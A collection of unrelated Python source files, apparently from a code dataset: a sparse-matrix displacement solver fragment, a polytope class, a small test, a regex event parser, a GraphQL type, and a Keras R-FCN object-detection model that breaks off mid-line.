dia4 = np.ones(nm-n) #diagonal corresponding to up neghbors
dia4[:n]+=1
dia5 = np.ones(nm-n) #diagonal corresponding to bottom neighbors
dia5[-n:]+=1
#sparse coef. (stiffness) matrix built out of 5 diagonals
K = sp.sparse.diags([dia1, dia2, dia3, dia4, dia5], [0, 1, -1, n, -n], format='csc')
#BCdofs is the vector of degrees of freedom with dirichlet (displacement) boundary condition
BCdofs=np.concatenate((np.arange(0,nm,n),np.arange(n-1,nm,n)))
BCvals=np.zeros(BCdofs.size)
#for applying the dirichlet, for dofs with displacement BC, the rhs is set to the according dispalcement
rhs[BCdofs]=BCvals
#loop over gate points as additional displacement BCs (non-zero, in contrast to left & right edges)
for vertex in (gate_points):
glob_id = mesh.vertex_attribute(vertex, "glob_id")
x_disp = mesh.vertex_attribute(vertex, "z_disp")
rhs[glob_id]=x_disp
BCdofs = np.append(BCdofs,glob_id)
#constructing an identitiy matrix (named Iinter) of size (nm x nm) with zero value on diagonals
# of displacement BC dofs. If applied on (multiplied by) K, only non-BC (internal) dofs will remain
diaInter=np.ones(nm)
diaInter[BCdofs]=0.0
Iinter = sp.sparse.diags([diaInter], [0], format='csc')
#constructing an identitiy matrix (named Ibc) of size (nm x nm) with zero value on diagonals
# of internal (non-BC) dofs. If applied on (multiplied by) K, only BC (internal) dofs will remain
diaBC=np.zeros(nm)
diaBC[BCdofs]=1.0
Ibc = sp.sparse.diags([diaBC], [0], format='csc')
#applying dirichlet on K, by zeroing out rows and columns of BC dofs and setting BC-diagonals to 1
K_BC= Iinter * K * Iinter + Ibc
#modifying the rhs for non-BC dofs to account for the eliminated dofs
# the operation below assignes -K_internal*x_BC to rhs_internal (and doesn't change rhs_BC)
rhs = rhs - Iinter * (K-(Ibc * K ))* rhs
#solving the system
sol = scipy.sparse.linalg.spsolve(K_BC,rhs)
return sol
|
python
|
"""
A class to hold polytopes in H-representation.
Francesc Font-Clos
Oct 2018
"""
import numpy as np
class Polytope(object):
"""A polytope in H-representation."""
def __init__(self, A=None, b=None):
"""
Create a polytope in H-representation.
The polytope is defined as the set of
points x in Rn such that
A x <= b
"""
# dimensionality verifications
assert A is not None and b is not None
assert len(b.shape) == 1
assert len(A.shape) == 2
assert A.shape[0] == len(b)
# store data
self.A = A
self.b = b
self.dim = A.shape[1]
self.nplanes = A.shape[0]
self._find_auxiliar_points_in_planes()
def check_inside(self, point):
"""Check if a point is inside the polytope."""
checks = self.A@point <= self.b
check = np.all(checks)
return check
def _find_auxiliar_points_in_planes(self):
"""Find an auxiliar point for each plane."""
aux_points = [self._find_auxiliar_point(self.A[i],
self.b[i])
for i in range(self.nplanes)]
self.auxiliar_points = aux_points
def _find_auxiliar_point(self, Ai, bi):
"""Find an auxiliar point for one plane."""
p = np.zeros(self.dim)
j = np.argmax(Ai != 0)
p[j] = bi / Ai[j]
return p
|
python
|
import udfalcon
def test_outputs_return_results():
assert isinstance(udfalcon.fly({'output': 'return', 'mode': 'test'}), dict)
|
python
|
import re
def main():
eventRegex = r'\s*\n*-{50,}\s*\n*'
placeRegex = r'(?i)(?:place|yer|location|mekan)\s*:\s+(.*?)\s*?[\n\r]'
dateRegex = r'(?i)(?:date|tarih|deadline)\s*:\s+(.*?)\s*?[\n\r]'
timeRegex = r'(?i)(?:time|zaman)\s*:\s+(.*?)\s*?[\n\r]'
testData = getTestData()
for i in range(len(testData)):
events = re.split(eventRegex, testData[i])
for j, event in enumerate(events):
eventPlace = re.findall(placeRegex, event)
eventDate = re.findall(dateRegex, event)
eventTime = re.findall(timeRegex, event)
file = open("results/" + str(i) + "/" + str(j) + ".txt","a")
file.write(event)
# print("The event place is: {}, \nThe event date is: {}, \nThe event time is: {}, \nThe event is:\n {}".format(eventPlace, eventDate, eventTime, event))
file.close()
def getTestData():
"""looping through the test date and returning the data as a String array"""
testData = []
for i in range(12):
file = open("testData/test" + str(i) + ".txt", "r")
text = file.readlines()
file.close()
testData.append("".join(text))
return testData
if __name__== "__main__":
main()
|
python
|
import graphene
from .models import Media
from .service import MediaService
service = MediaService()
class MediaType(graphene.ObjectType):
'''
Media Type,
represents a GraphQL version of a media entity
'''
id = graphene.ID(required=True)
mime = graphene.String(required=True)
data = graphene.String(required=True)
|
python
|
'''
This is Main class of RFCN Model
Contain the model's framework and call the backbone
'''
from KerasRFCN.Model.ResNet import ResNet
from KerasRFCN.Model.ResNet_dilated import ResNet_dilated
from KerasRFCN.Model.BaseModel import BaseModel
import KerasRFCN.Utils
import KerasRFCN.Losses
import keras.layers as KL
import keras.engine as KE
import tensorflow as tf
import numpy as np
import keras
import keras.backend as K
import keras.models as KM
class RFCN_Model(BaseModel):
"""docstring for RFCN_Model"""
def __init__(self, mode, config, model_dir):
"""
mode: Either "training" or "inference"
config: A Sub-class of the Config class
model_dir: Directory to save training logs and trained weights
"""
assert mode in ['training', 'inference']
assert config.BACKBONE in ['resnet50', 'resnet101', 'resnet50_dilated', 'resnet101_dilated']
self.mode = mode
self.config = config
self.model_dir = model_dir
self.set_log_dir()
self.keras_model = self.build(mode=mode, config=config)
def build(self, mode, config):
assert mode in ['training', 'inference']
h, w = config.IMAGE_SHAPE[:2]
if h / 2**6 != int(h / 2**6) or w / 2**6 != int(w / 2**6):
raise Exception("Image size must be dividable by 2 at least 6 times "
"to avoid fractions when downscaling and upscaling."
"For example, use 256, 320, 384, 448, 512, ... etc. ")
# Inputs
input_image = KL.Input(
shape=config.IMAGE_SHAPE.tolist(), name="input_image")
input_image_meta = KL.Input(shape=[None], name="input_image_meta")
if mode == "training":
# RPN GT
input_rpn_match = KL.Input(
shape=[None, 1], name="input_rpn_match", dtype=tf.int32)
input_rpn_bbox = KL.Input(
shape=[None, 4], name="input_rpn_bbox", dtype=tf.float32)
# Detection GT (class IDs, bounding boxes)
# 1. GT Class IDs (zero padded)
input_gt_class_ids = KL.Input(
shape=[None], name="input_gt_class_ids", dtype=tf.int32)
# 2. GT Boxes in pixels (zero padded)
# [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in image coordinates
input_gt_boxes = KL.Input(
shape=[None, 4], name="input_gt_boxes", dtype=tf.float32)
# Normalize coordinates
h, w = K.shape(input_image)[1], K.shape(input_image)[2]
image_scale = K.cast(K.stack([h, w, h, w], axis=0), tf.float32)
gt_boxes = KL.Lambda(lambda x: x / image_scale)(input_gt_boxes)
if config.BACKBONE in ['resnet50', 'resnet101']:
P2, P3, P4, P5, P6 = ResNet(input_image, architecture=config.BACKBONE).output_layers
else:
P2, P3, P4, P5, P6 = ResNet_dilated(input_image, architecture=config.BACKBONE).output_layers
# Note that P6 is used in RPN, but not in the classifier heads.
rpn_feature_maps = [P2, P3, P4, P5, P6]
mrcnn_feature_maps = [P2, P3, P4, P5]
### RPN ###
rpn = self.build_rpn_model(config.RPN_ANCHOR_STRIDE,
len(config.RPN_ANCHOR_RATIOS), 256)
# Loop through pyramid layers
layer_outputs = [] # list of lists
for p in rpn_feature_maps:
layer_outputs.append(rpn([p]))
# Concatenate layer outputs
# Convert from list of lists of level outputs to list of lists
# of outputs across levels.
# e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]
output_names = ["rpn_class_logits", "rpn_class", "rpn_bbox"]
outputs = list(zip(*layer_outputs))
outputs = [KL.Concatenate(axis=1, name=n)(list(o))
for o, n in zip(outputs, output_names)]
rpn_class_logits, rpn_class, rpn_bbox = outputs
self.anchors = KerasRFCN.Utils.generate_pyramid_anchors(config.RPN_ANCHOR_SCALES,
config.RPN_ANCHOR_RATIOS,
config.BACKBONE_SHAPES,
config.BACKBONE_STRIDES,
config.RPN_ANCHOR_STRIDE)
# window size K and total classed num C
# Example: For coco, C = 80+1
scoreMapSize = config.K * config.K
ScoreMaps_classify = []
for feature_map_count, feature_map in enumerate(mrcnn_feature_maps):
# [W * H * class_num] * k^2
ScoreMap = KL.Conv2D(config.C * scoreMapSize, kernel_size=(1,1), name="score_map_class_{}".format(feature_map_count), padding='valid')(feature_map)
ScoreMaps_classify.append(ScoreMap)
ScoreMaps_regr = []
for feature_map_count, feature_map in enumerate(mrcnn_feature_maps):
# [W * H * 4] * k^2 ==> 4 = (x,y,w,h)
ScoreMap = KL.Conv2D(4 * scoreMapSize, kernel_size=(1,1), name="score_map_regr_{}".format(feature_map_count), padding='valid')(feature_map)
ScoreMaps_regr.append(ScoreMap)
# Generate proposals
# Proposals are [batch, N, (y1, x1, y2, x2)] in normalized coordinates
# and zero padded.
proposal_count = config.POST_NMS_ROIS_TRAINING if mode == "training"\
else config.POST_NMS_ROIS_INFERENCE
rpn_rois = ProposalLayer(proposal_count=proposal_count,
nms_threshold=config.RPN_NMS_THRESHOLD,
name="ROI",
anchors=self.anchors,
config=config)([rpn_class, rpn_bbox])
if mode == "training":
# Class ID mask to mark class IDs supported by the dataset the image
# came from.
_, _, _, active_class_ids = KL.Lambda(lambda x: parse_image_meta_graph(x))(input_image_meta)
# Generate detection targets
# Subsamples proposals and generates target outputs for training
# Note that proposal class IDs, gt_boxes, and gt_masks are zero
# padded. Equally, returned rois and targets are zero padded.
rois, target_class_ids, target_bbox =\
DetectionTargetLayer(config, name="proposal_targets")([
rpn_rois, input_gt_class_ids, gt_boxes])
# size = [batch, num_rois, class_num]
classify_vote = VotePooling(config.TRAIN_ROIS_PER_IMAGE, config.C, config.K, config.POOL_SIZE, config.BATCH_SIZE, config.IMAGE_SHAPE, name="classify_vote")([rois] + ScoreMaps_classify)
classify_output = KL.TimeDistributed(KL.Activation('softmax'),name="classify_output")(classify_vote)
# 4 k^2 rather than 4k^2*C
regr_vote = VotePooling(config.TRAIN_ROIS_PER_IMAGE, 4, config.K, config.POOL_SIZE, config.BATCH_SIZE, config.IMAGE_SHAPE, name="regr_vote")([rois] + ScoreMaps_regr)
regr_output = KL.TimeDistributed(KL.Activation('linear'),name="regr_output")(regr_vote)
rpn_class_loss = KL.Lambda(lambda x: KerasRFCN.Losses.rpn_class_loss_graph(*x), name="rpn_class_loss")(
[input_rpn_match, rpn_class_logits])
rpn_bbox_loss = KL.Lambda(lambda x: KerasRFCN.Losses.rpn_bbox_loss_graph(config, *x), name="rpn_bbox_loss")(
[input_rpn_bbox, input_rpn_match, rpn_bbox])
class_loss = KL.Lambda(lambda x: KerasRFCN.Losses.mrcnn_class_loss_graph(*x), name="mrcnn_class_loss")(
[target_class_ids, classify_vote, active_class_ids])
bbox_loss = KL.Lambda(lambda x: KerasRFCN.Losses.mrcnn_bbox_loss_graph(*x), name="mrcnn_bbox_loss")(
[target_bbox, target_class_ids, regr_output])
inputs = [input_image, input_image_meta,
input_rpn_match, input_rpn_bbox, input_gt_class_ids, input_gt_boxes]
outputs = [rpn_class_logits, rpn_class, rpn_bbox,
classify_vote, classify_output, regr_output,
rpn_rois, rpn_class_loss, rpn_bbox_loss, class_loss, bbox_loss]
keras_model = KM.Model(inputs, outputs, name='rfcn_train')
else: # inference
# Network Heads
# Proposal classifier and BBox regressor heads
# size = [batch, num_rois, class_num]
classify_vote = VotePooling(proposal_count, config.C, config.K, config.POOL_SIZE, config.BATCH_SIZE, config.IMAGE_SHAPE, name="classify_vote")([rpn_rois] + ScoreMaps_classify)
classify_output = KL.TimeDistributed(KL.Activation('softmax'),name="classify_output")(classify_vote)
# 4 k^2 rather than 4k^2*C
regr_vote = VotePooling(proposal_count, 4, config.K, config.POOL_SIZE, config.BATCH_SIZE, config.IMAGE_SHAPE, name="regr_vote")([rpn_rois] + ScoreMaps_regr)
regr_output = KL.TimeDistributed(KL.Activation('linear'),name="regr_output")(regr_vote)
# Detections
# output is [batch, num_detections, (y1, x1, y2, x2, score)] in image coordinates
detections = DetectionLayer(config, name="mrcnn_detection")(
[rpn_rois, classify_output, regr_output, input_image_meta])
keras_model = KM.Model([input_image, input_image_meta],
[detections, classify_output, regr_output, rpn_rois, rpn_class, rpn_bbox],
name='rfcn_inference')
return keras_model
def build_rpn_model(self, anchor_stride, anchors_per_location, depth):
"""Builds a Keras model of the Region Proposal Network.
It wraps the RPN graph so it can be used multiple times with shared
weights.
anchors_per_location: number of anchors per pixel in the feature map
anchor_stride: Controls the density of anchors. Typically 1 (anchors for
every pixel in the feature map), or 2 (every other pixel).
depth: Depth of the backbone feature map.
Returns a Keras Model object. The model outputs, when called, are:
rpn_logits: [batch, H, W, 2] Anchor classifier logits (before softmax)
rpn_probs: [batch, W, W, 2] Anchor classifier probabilities.
rpn_bbox: [batch, H, W, (dy, dx, log(dh), log(dw))] Deltas to be
applied to anchors.
"""
input_feature_map = KL.Input(shape=[None, None, depth],
name="input_rpn_feature_map")
outputs = self.rpn(input_feature_map, anchors_per_location, anchor_stride)
return KM.Model([input_feature_map], outputs, name="rpn_model")
def rpn(self, feature_map, anchors_per_location, anchor_stride):
"""Builds a Keras model of the Region Proposal Network.
It wraps the RPN graph so it can be used multiple times with shared
weights.
anchors_per_location: number of anchors per pixel in the feature map
anchor_stride: Controls the density of anchors. Typically 1 (anchors for
every pixel in the feature map), or 2 (every other pixel).
depth: Depth of the backbone feature map.
Returns a Keras Model object. The model outputs, when called, are:
rpn_logits: [batch, H, W, 2] Anchor classifier logits (before softmax)
rpn_probs: [batch, W, W, 2] Anchor classifier probabilities.
rpn_bbox: [batch, H, W, (dy, dx, log(dh), log(dw))] Deltas to be
applied to anchors.
"""
shared = KL.Conv2D(512, (3, 3), padding='same', activation='relu',
strides=anchor_stride,
name='rpn_conv_shared')(feature_map)
# Anchor Score. [batch, height, width, anchors per location * 2].
x = KL.Conv2D(2 * anchors_per_location, (1, 1), padding='valid',
activation='linear', name='rpn_class_raw')(shared)
# Reshape to [batch, anchors, 2]
rpn_class_logits = KL.Lambda(
lambda t: tf.reshape(t, [tf.shape(t)[0], -1, 2]))(x)
# Softmax on last dimension of BG/FG.
rpn_probs = KL.Activation(
"softmax", name="rpn_class_xxx")(rpn_class_logits)
# Bounding box refinement. [batch, H, W, anchors per location, depth]
# where depth is [x, y, log(w), log(h)]
x = KL.Conv2D(anchors_per_location * 4, (1, 1), padding="valid",
activation='linear', name='rpn_bbox_pred')(shared)
# Reshape to [batch, anchors, 4]
rpn_bbox = KL.Lambda(lambda t: tf.reshape(t, [tf.shape(t)[0], -1, 4]))(x)
return rpn_class_logits, rpn_probs, rpn_bbox
############################################################
# Proposal Layer
############################################################
def apply_box_deltas_graph(boxes, deltas):
"""Applies the given deltas to the given boxes.
boxes: [N, 4] where each row is y1, x1, y2, x2
deltas: [N, 4] where each row is [dy, dx, log(dh), log(dw)]
"""
# Convert to y, x, h, w
height = boxes[:, 2] - boxes[:, 0]
width = boxes[:, 3] - boxes[:, 1]
center_y = boxes[:, 0] + 0.5 * height
center_x = boxes[:, 1] + 0.5 * width
# Apply deltas
center_y += deltas[:, 0] * height
center_x += deltas[:, 1] * width
height *= tf.exp(deltas[:, 2])
width *= tf.exp(deltas[:, 3])
# Convert back to y1, x1, y2, x2
y1 = center_y - 0.5 * height
x1 = center_x - 0.5 * width
y2 = y1 + height
x2 = x1 + width
result = tf.stack([y1, x1, y2, x2], axis=1, name="apply_box_deltas_out")
return result
def clip_boxes_graph(boxes, window):
"""
boxes: [N, 4] each row is y1, x1, y2, x2
window: [4] in the form y1, x1, y2, x2
"""
# Split corners
wy1, wx1, wy2, wx2 = tf.split(window, 4)
y1, x1, y2, x2 = tf.split(boxes, 4, axis=1)
# Clip
y1 = tf.maximum(tf.minimum(y1, wy2), wy1)
x1 = tf.maximum(tf.minimum(x1, wx2), wx1)
y2 = tf.maximum(tf.minimum(y2, wy2), wy1)
x2 = tf.maximum(tf.minimum(x2, wx2), wx1)
clipped = tf.concat([y1, x1, y2, x2], axis=1, name="clipped_boxes")
return clipped
class ProposalLayer(KE.Layer):
"""Receives anchor scores and selects a subset to pass as proposals
to the second stage. Filtering is done based on anchor scores and
non-max suppression to remove overlaps. It also applies bounding
box refinment detals to anchors.
Inputs:
rpn_probs: [batch, anchors, (bg prob, fg prob)]
rpn_bbox: [batch, anchors, (dy, dx, log(dh), log(dw))]
Returns:
Proposals in normalized coordinates [batch, rois, (y1, x1, y2, x2)]
"""
def __init__(self, proposal_count, nms_threshold, anchors,
config=None, **kwargs):
"""
anchors: [N, (y1, x1, y2, x2)] anchors defined in image coordinates
"""
super(ProposalLayer, self).__init__(**kwargs)
self.config = config
self.proposal_count = proposal_count
self.nms_threshold = nms_threshold
self.anchors = anchors.astype(np.float32)
def call(self, inputs):
# Box Scores. Use the foreground class confidence. [Batch, num_rois, 1]
scores = inputs[0][:, :, 1]
# Box deltas [batch, num_rois, 4]
deltas = inputs[1]
deltas = deltas * np.reshape(self.config.RPN_BBOX_STD_DEV, [1, 1, 4])
# Base anchors
anchors = self.anchors
# Improve performance by trimming to top anchors by score
# and doing the rest on the smaller subset.
pre_nms_limit = min(6000, self.anchors.shape[0])
ix = tf.nn.top_k(scores, pre_nms_limit, sorted=True,
name="top_anchors").indices
scores = KerasRFCN.Utils.batch_slice([scores, ix], lambda x, y: tf.gather(x, y),
self.config.IMAGES_PER_GPU)
deltas = KerasRFCN.Utils.batch_slice([deltas, ix], lambda x, y: tf.gather(x, y),
self.config.IMAGES_PER_GPU)
anchors = KerasRFCN.Utils.batch_slice(ix, lambda x: tf.gather(anchors, x),
self.config.IMAGES_PER_GPU,
names=["pre_nms_anchors"])
# Apply deltas to anchors to get refined anchors.
# [batch, N, (y1, x1, y2, x2)]
boxes = KerasRFCN.Utils.batch_slice([anchors, deltas],
lambda x, y: apply_box_deltas_graph(x, y),
self.config.IMAGES_PER_GPU,
names=["refined_anchors"])
# Clip to image boundaries. [batch, N, (y1, x1, y2, x2)]
height, width = self.config.IMAGE_SHAPE[:2]
window = np.array([0, 0, height, width]).astype(np.float32)
boxes = KerasRFCN.Utils.batch_slice(boxes,
lambda x: clip_boxes_graph(x, window),
self.config.IMAGES_PER_GPU,
names=["refined_anchors_clipped"])
# Filter out small boxes
# According to Xinlei Chen's paper, this reduces detection accuracy
# for small objects, so we're skipping it.
# Normalize dimensions to range of 0 to 1.
normalized_boxes = boxes / np.array([[height, width, height, width]])
# Non-max suppression
def nms(normalized_boxes, scores):
indices = tf.image.non_max_suppression(
normalized_boxes, scores, self.proposal_count,
self.nms_threshold, name="rpn_non_max_suppression")
proposals = tf.gather(normalized_boxes, indices)
# Pad if needed
padding = tf.maximum(self.proposal_count - tf.shape(proposals)[0], 0)
proposals = tf.pad(proposals, [(0, padding), (0, 0)])
return proposals
proposals = KerasRFCN.Utils.batch_slice([normalized_boxes, scores], nms,
self.config.IMAGES_PER_GPU)
return proposals
def compute_output_shape(self, input_shape):
return (None, self.proposal_count, 4)
############################################################
# Detection Target Layer
############################################################
def overlaps_graph(boxes1, boxes2):
"""Computes IoU overlaps between two sets of boxes.
boxes1, boxes2: [N, (y1, x1, y2, x2)].
"""
# 1. Tile boxes2 and repeate boxes1. This allows us to compare
# every boxes1 against every boxes2 without loops.
# TF doesn't have an equivalent to np.repeate() so simulate it
# using tf.tile() and tf.reshape.
b1 = tf.reshape(tf.tile(tf.expand_dims(boxes1, 1),
[1, 1, tf.shape(boxes2)[0]]), [-1, 4])
b2 = tf.tile(boxes2, [tf.shape(boxes1)[0], 1])
# 2. Compute intersections
b1_y1, b1_x1, b1_y2, b1_x2 = tf.split(b1, 4, axis=1)
b2_y1, b2_x1, b2_y2, b2_x2 = tf.split(b2, 4, axis=1)
y1 = tf.maximum(b1_y1, b2_y1)
x1 = tf.maximum(b1_x1, b2_x1)
y2 = tf.minimum(b1_y2, b2_y2)
x2 = tf.minimum(b1_x2, b2_x2)
intersection = tf.maximum(x2 - x1, 0) * tf.maximum(y2 - y1, 0)
# 3. Compute unions
b1_area = (b1_y2 - b1_y1) * (b1_x2 - b1_x1)
b2_area = (b2_y2 - b2_y1) * (b2_x2 - b2_x1)
union = b1_area + b2_area - intersection
# 4. Compute IoU and reshape to [boxes1, boxes2]
iou = intersection / union
overlaps = tf.reshape(iou, [tf.shape(boxes1)[0], tf.shape(boxes2)[0]])
return overlaps
def detection_targets_graph(proposals, gt_class_ids, gt_boxes, config):
"""Generates detection targets for one image. Subsamples proposals and
generates target class IDs, bounding box deltas for each.
Inputs:
proposals: [N, (y1, x1, y2, x2)] in normalized coordinates. Might
be zero padded if there are not enough proposals.
gt_class_ids: [MAX_GT_INSTANCES] int class IDs
gt_boxes: [MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized coordinates.
Returns: Target ROIs and corresponding class IDs, bounding box shifts
rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized coordinates
class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs. Zero padded.
deltas: [TRAIN_ROIS_PER_IMAGE, NUM_CLASSES, (dy, dx, log(dh), log(dw))]
Class-specific bbox refinments.
Note: Returned arrays might be zero padded if not enough target ROIs.
"""
# Assertions
asserts = [
tf.Assert(tf.greater(tf.shape(proposals)[0], 0), [proposals],
name="roi_assertion"),
]
with tf.control_dependencies(asserts):
proposals = tf.identity(proposals)
# Remove zero padding
proposals, _ = trim_zeros_graph(proposals, name="trim_proposals")
gt_boxes, non_zeros = trim_zeros_graph(gt_boxes, name="trim_gt_boxes")
gt_class_ids = tf.boolean_mask(gt_class_ids, non_zeros,
name="trim_gt_class_ids")
# Handle COCO crowds
# A crowd box in COCO is a bounding box around several instances. Exclude
# them from training. A crowd box is given a negative class ID.
crowd_ix = tf.where(gt_class_ids < 0)[:, 0]
non_crowd_ix = tf.where(gt_class_ids > 0)[:, 0]
crowd_boxes = tf.gather(gt_boxes, crowd_ix)
gt_class_ids = tf.gather(gt_class_ids, non_crowd_ix)
gt_boxes = tf.gather(gt_boxes, non_crowd_ix)
# Compute overlaps matrix [proposals, gt_boxes]
overlaps = overlaps_graph(proposals, gt_boxes)
# Compute overlaps with crowd boxes [anchors, crowds]
crowd_overlaps = overlaps_graph(proposals, crowd_boxes)
crowd_iou_max = tf.reduce_max(crowd_overlaps, axis=1)
no_crowd_bool = (crowd_iou_max < 0.001)
# Determine postive and negative ROIs
roi_iou_max = tf.reduce_max(overlaps, axis=1)
# 1. Positive ROIs are those with >= 0.5 IoU with a GT box
positive_roi_bool = (roi_iou_max >= 0.5)
positive_indices = tf.where(positive_roi_bool)[:, 0]
# 2. Negative ROIs are those with < 0.5 with every GT box. Skip crowds.
negative_indices = tf.where(tf.logical_and(roi_iou_max < 0.5, no_crowd_bool))[:, 0]
# Subsample ROIs. Aim for 33% positive
# Positive ROIs
positive_count = int(config.TRAIN_ROIS_PER_IMAGE *
config.ROI_POSITIVE_RATIO)
positive_indices = tf.random_shuffle(positive_indices)[:positive_count]
positive_count = tf.shape(positive_indices)[0]
# Negative ROIs. Add enough to maintain positive:negative ratio.
r = 1.0 / config.ROI_POSITIVE_RATIO
negative_count = tf.cast(r * tf.cast(positive_count, tf.float32), tf.int32) - positive_count
negative_indices = tf.random_shuffle(negative_indices)[:negative_count]
# Gather selected ROIs
positive_rois = tf.gather(proposals, positive_indices)
negative_rois = tf.gather(proposals, negative_indices)
# Assign positive ROIs to GT boxes.
positive_overlaps = tf.gather(overlaps, positive_indices)
roi_gt_box_assignment = tf.argmax(positive_overlaps, axis=1)
roi_gt_boxes = tf.gather(gt_boxes, roi_gt_box_assignment)
roi_gt_class_ids = tf.gather(gt_class_ids, roi_gt_box_assignment)
# Compute bbox refinement for positive ROIs
deltas = KerasRFCN.Utils.box_refinement_graph(positive_rois, roi_gt_boxes)
deltas /= config.BBOX_STD_DEV
# Append negative ROIs and pad bbox deltas and masks that
# are not used for negative ROIs with zeros.
rois = tf.concat([positive_rois, negative_rois], axis=0)
N = tf.shape(negative_rois)[0]
P = tf.maximum(config.TRAIN_ROIS_PER_IMAGE - tf.shape(rois)[0], 0)
rois = tf.pad(rois, [(0, P), (0, 0)])
roi_gt_boxes = tf.pad(roi_gt_boxes, [(0, N + P), (0, 0)])
roi_gt_class_ids = tf.pad(roi_gt_class_ids, [(0, N + P)])
deltas = tf.pad(deltas, [(0, N + P), (0, 0)])
return rois, roi_gt_class_ids, deltas
def trim_zeros_graph(boxes, name=None):
"""Often boxes are represented with matricies of shape [N, 4] and
are padded with zeros. This removes zero boxes.
boxes: [N, 4] matrix of boxes.
non_zeros: [N] a 1D boolean mask identifying the rows to keep
"""
non_zeros = tf.cast(tf.reduce_sum(tf.abs(boxes), axis=1), tf.bool)
boxes = tf.boolean_mask(boxes, non_zeros, name=name)
return boxes, non_zeros
class DetectionTargetLayer(KE.Layer):
"""Subsamples proposals and generates target box refinment, class_ids for each.
Inputs:
proposals: [batch, N, (y1, x1, y2, x2)] in normalized coordinates. Might
be zero padded if there are not enough proposals.
gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs.
gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized
coordinates.
Returns: Target ROIs and corresponding class IDs, bounding box shifts
rois: [batch, TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized
coordinates
target_class_ids: [batch, TRAIN_ROIS_PER_IMAGE]. Integer class IDs.
target_deltas: [batch, TRAIN_ROIS_PER_IMAGE, NUM_CLASSES,
(dy, dx, log(dh), log(dw), class_id)]
Class-specific bbox refinments.
Note: Returned arrays might be zero padded if not enough target ROIs.
"""
def __init__(self, config, **kwargs):
super(DetectionTargetLayer, self).__init__(**kwargs)
self.config = config
def call(self, inputs):
proposals = inputs[0]
gt_class_ids = inputs[1]
gt_boxes = inputs[2]
# Slice the batch and run a graph for each slice
# TODO: Rename target_bbox to target_deltas for clarity
names = ["rois", "target_class_ids", "target_bbox"]
outputs = KerasRFCN.Utils.batch_slice(
[proposals, gt_class_ids, gt_boxes],
lambda w, x, y: detection_targets_graph(
w, x, y, self.config),
self.config.IMAGES_PER_GPU, names=names)
return outputs
def compute_output_shape(self, input_shape):
return [
(None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # rois
(None, 1), # class_ids
(None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # deltas
]
############################################################
# ROI pooling on Muti Bins
############################################################
def log2_graph(x):
"""Implementatin of Log2. TF doesn't have a native implemenation."""
return tf.log(x) / tf.log(2.0)
class VotePooling(KE.Layer):
def __init__(self, num_rois, channel_num, k, pool_shape, batch_size, image_shape, **kwargs):
super(VotePooling, self).__init__(**kwargs)
self.channel_num = channel_num
self.k = k
self.num_rois = num_rois
self.pool_shape = pool_shape
self.batch_size = batch_size
self.image_shape = image_shape
def call(self, inputs):
boxes = inputs[0]
# Feature Maps. List of feature maps from different level of the
# feature pyramid. Each is [batch, height, width, channels]
score_maps = inputs[1:]
# Assign each ROI to a level in the pyramid based on the ROI area.
y1, x1, y2, x2 = tf.split(boxes, 4, axis=2)
h = y2 - y1
w = x2 - x1
# Equation 1 in the Feature Pyramid Networks paper. Account for
# the fact that our coordinates are normalized here.
# e.g. a 224x224 ROI (in pixels) maps to P4
image_area = tf.cast(
self.image_shape[0] * self.image_shape[1], tf.float32)
roi_level = log2_graph(tf.sqrt(h * w) / (224.0 / tf.sqrt(image_area)))
roi_level = tf.minimum(5, tf.maximum(
2, 4 + tf.cast(tf.round(roi_level), tf.int32)))
roi_level = tf.squeeze(roi_level, 2)
# Loop through levels and apply ROI pooling to each. P2 to P5.
pooled = []
box_to_level = []
for i, level in enumerate(range(2, 6)):
ix = tf.where(tf.equal(roi_level, level))
level_boxes = tf.gather_nd(boxes, ix)
# Box indicies for crop_and_resize.
box_indices = tf.cast(ix[:, 0], tf.int32)
# Keep track of which box is mapped to which level
box_to_level.append(ix)
# Stop gradient propogation to ROI proposals
level_boxes = tf.stop_gradient(level_boxes)
box_indices = tf.stop_gradient(box_indices)
# Here we use the simplified approach of a single value per bin,
# which is how it's done in tf.crop_and_resize()
# Result: [batch * num_boxes, pool_height, pool_width, channels]
pooled.append(tf.image.crop_and_resize(
score_maps[i], level_boxes, box_indices, [self.pool_shape * self.k, self.pool_shape * self.k],
method="bilinear"))
# Pack pooled features into one tensor
pooled = tf.concat(pooled, axis=0)
# position-sensitive ROI pooling + classify
score_map_bins = []
for channel_step in range(self.k*self.k):
bin_x = K.variable( int(channel_step % self.k) * self.pool_shape, dtype='int32')
bin_y = K.variable( int(channel_step / self.k) * self.pool_shape, dtype='int32')
channel_indices = K.variable(list(range(channel_step*self.channel_num, (channel_step+1)*self.channel_num)), dtype='int32')
croped = tf.image.crop_to_bounding_box(
tf.gather( pooled, indices=channel_indices, axis=-1), bin_y, bin_x, self.pool_shape, self.pool_shape)
# [pool_shape, pool_shape, channel_num] ==> [1,1,channel_num] ==> [1, channel_num]
croped_mean = K.pool2d(croped, (self.pool_shape, self.pool_shape), strides=(1, 1), padding='valid', data_format="channels_last", pool_mode='avg')
# [batch * num_rois, 1,1,channel_num] ==> [batch * num_rois, 1, channel_num]
croped_mean = K.squeeze(croped_mean, axis=1)
score_map_bins.append(croped_mean)
# [batch * num_rois, k^2, channel_num]
score_map_bins = tf.concat(score_map_bins, axis=1)
# [batch * num_rois, k*k, channel_num] ==> [batch * num_rois,channel_num]
# because "keepdims=False", the axis 1 will not keep. else will be [batch * num_rois,1,channel_num]
pooled = K.sum(score_map_bins, axis=1)
# Pack box_to_level mapping into one array and add another
# column representing the order of pooled boxes
box_to_level = tf.concat(box_to_level, axis=0)
box_range = tf.expand_dims(tf.range(tf.shape(box_to_level)[0]), 1)
box_to_level = tf.concat([tf.cast(box_to_level, tf.int32), box_range],
axis=1)
# Rearrange pooled features to match the order of the original boxes
# Sort box_to_level by batch then box index
# TF doesn't have a way to sort by two columns, so merge them and sort.
sorting_tensor = box_to_level[:, 0] * 100000 + box_to_level[:, 1]
ix = tf.nn.top_k(sorting_tensor, k=tf.shape(
